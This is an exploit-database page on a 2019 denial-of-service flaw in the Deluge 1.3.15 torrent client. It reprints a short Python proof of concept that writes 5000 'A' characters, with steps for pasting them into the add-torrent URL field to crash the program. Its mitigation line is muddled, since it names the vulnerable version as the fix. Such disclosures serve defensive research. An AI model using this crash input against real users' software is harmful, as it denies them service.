header-logo
Suggest Exploit
vendor:
Deluge
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Deluge
Affected Version From: 1.3.15
Affected Version To: 1.3.15
Patch Exists: YES
Related CWE: N/A
CPE: deluge-torrent.org
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

Deluge 1.3.15 – ‘URL’ Denial of Service (PoC)

Deluge 1.3.15 is vulnerable to a denial of service attack when a maliciously crafted URL is provided. When the URL is provided, the application crashes due to a buffer overflow. This can be exploited by an attacker to crash the application and deny service to legitimate users.

Mitigation:

Upgrade to the latest version of Deluge 1.3.15 or later.
Source

Exploit-DB raw data:

#Exploit Title: Deluge 1.3.15 - 'URL' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-20
#Vendor Homepage: https://dev.deluge-torrent.org/
#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
#Tested Version: 1.3.15
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: deluge_url.py
#2.- Open deluge_url.txt and copy content to clipboard
#3.- Open deluge.exe
#4.- Select "File" > "Add Torrent" > "URL"
#5.- In "From URL" field paste Clipboard
#6.- Select "OK"
#7.- Crashed

cod = "\x41" * 5000

f = open('deluge_url.txt', 'w')
f.write(cod)
f.close()

Navigation

Suggest Exploit

Services By CQR